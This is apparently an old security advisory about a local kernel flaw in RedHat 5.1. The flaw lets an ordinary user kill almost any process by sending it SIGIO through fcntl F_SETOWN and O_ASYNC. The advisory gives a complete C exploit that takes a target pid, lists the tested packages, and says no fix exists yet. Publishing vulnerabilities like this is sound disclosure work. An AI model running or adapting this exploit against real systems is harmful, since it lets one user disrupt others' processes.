COMMAND

    kernel

SYSTEMS AFFECTED

    RedHat 5.1 (others?)

PROBLEM

    Ryan Dibble found the following.  The code below will result in the
    termination of almost any process, no matter who owns it.  The good
    news is that init, kflushd, kswapd, and klogd appear not to be
    affected.  In order to run this the user must have login access to
    the machine.  This code has been tested on two different machines
    running RedHat 5.1 with the following packages:

        kernel-2.0.34-0.6
        glibc-2.0.7-13
        glib-1.0.1-2
        glibc-debug-2.0.7-13
        glibc-devel-2.0.7-13
        glibc-profile-2.0.7-13

    Exploit follows:

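    #include <fcntl.h>
    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(int argc, char *argv[]) {
      int s, p;
      if (argc != 2) {
        fputs("Please specify a pid to send signal to.\n", stderr);
        exit(1);                      /* usage error */
      } else {
        p = atoi(argv[1]);
      }
      /* Name pid p as the owner of stdin; the owner receives SIGIO. */
      fcntl(0,F_SETOWN,p);
      /* Turn on asynchronous I/O notification for stdin. */
      s = fcntl(0,F_GETFL,0);
      fcntl(0,F_SETFL,s|O_ASYNC);
      printf("Sending SIGIO - press enter.\n");
      /* Input arriving on stdin makes the kernel signal the owner. */
      getchar();
      /* Restore the original file status flags. */
      fcntl(0,F_SETFL,s&~O_ASYNC);
      printf("SIGIO send attempted.\n");
      return 0;
    }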

SOLUTION

    Nothing yet.